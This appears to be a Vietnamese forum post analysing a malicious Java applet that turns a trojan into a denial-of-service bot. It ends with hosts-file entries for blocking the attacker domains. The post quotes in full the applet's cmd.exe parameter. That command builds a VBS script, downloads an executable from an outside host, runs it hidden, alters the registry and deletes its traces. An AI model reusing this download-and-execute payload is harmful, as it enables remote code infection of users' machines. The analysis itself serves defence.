Mấy con "sâu" mà Xuân Nhi cảnh báo không thể mở camera hay microphone trên máy bởi v́ chúng không có instruction cho tất cả các devices. Tôi đă gởi 1 bài phân tích nhưng bị tin tặc deface nên phải phục hồi bản lưu cũ hơn.
Tổng thể mà nói, java applet MediaPlayer.jar chạy từ trang http://images.ohbah.com chỉ đơn giản thực thi các công tác lấy từ param có tên là "p":
Code:
param name='p' value='cmd.exe /c del %TEMP%\bnkyiz.vbs /F & echo Dim bst >> %TEMP%\bnkyiz.vbs & echo Dim s >> %TEMP%\bnkyiz.vbs & echo s="AD" >> %TEMP%\bnkyiz.vbs & echo s=s+"ODB.S"+"tream" >> %TEMP%\bnkyiz.vbs & echo Set bst=CreateObject(s) >> %TEMP%\bnkyiz.vbs & echo bst.Type=1 >> %TEMP%\bnkyiz.vbs & echo bst.Open >> %TEMP%\bnkyiz.vbs & echo bst.Write bg(Wscript.Arguments(0)) >> %TEMP%\bnkyiz.vbs & echo bst.SaveToFile Wscript.Arguments(1), 2 >> %TEMP%\bnkyiz.vbs & echo Function bg(URL) >> %TEMP%\bnkyiz.vbs & echo Dim Http >> %TEMP%\bnkyiz.vbs & echo Set Http = CreateObject("WinHttp.WinHttpRequest.5.1") >> %TEMP%\bnkyiz.vbs & echo Http.Open "GET", URL, False >> %TEMP%\bnkyiz.vbs & echo Http.Send >> %TEMP%\bnkyiz.vbs & echo bg = Http.ResponseBody >> %TEMP%\bnkyiz.vbs & echo End Function >> %TEMP%\bnkyiz.vbs & echo s="WS" >> %TEMP%\bnkyiz.vbs & echo s=s+"cript.S"+"hell" >> %TEMP%\bnkyiz.vbs & echo Set shell = CreateObject (s) >> %TEMP%\bnkyiz.vbs & echo shell.Run "%TEMP%\gsnulqq.exe",0,True >> %TEMP%\bnkyiz.vbs & echo shell.Run "cmd.exe /c del %TEMP%\gsnulqq.exe /f",0 >> %TEMP%\bnkyiz.vbs & echo shell.Run "cmd.exe /c del %TEMP%\bnkyiz.vbs /f",0 >> %TEMP%\bnkyiz.vbs & start /MIN reg add "HKLM\Software\Microsoft\Windows Script Host\Settings" /v "Enabled" /t REG_DWORD /d 1 /f & start /MIN %TEMP%\bnkyiz.vbs http://images.ohbah.com/feed.xml %TEMP%\gsnulqq.exe'>
Rốt cuộc sẽ copy "feed.xml" từ http://images.ohbah.com về. Đây là 1 trojan trá h́nh và sẽ được đổi tên thành gsnulqq.exe. Sau đó gsnulqq.exe sẽ được tiến hành cài đặt và h́nh thành một task chạy trên máy với mạo danh Quicktime (QTTask.exe). Con này sẽ liên hệ các servers:
http://news.pedto.com
http://blogs.pinix.org
http://analytics.dynn.info
để lấy chỉ thị cho việc tấn công từ chối dịch vụ.
Anh chị em nên tạm thời chỉnh host file trên máy của ḿnh (trên Windows XP, Vista, Windows 7... chỉnh trong c:\windows\system32\ drivers\etc\hosts) và thêm các ḍng sau:
127.0.0.1 images.ohbah.com
127.0.0.1 frror.org www.frror.org
127.0.0.1 news.pedto.com
127.0.0.1 blogs.pinix.org
127.0.0.1 analytics.dynn.info
Bookmarks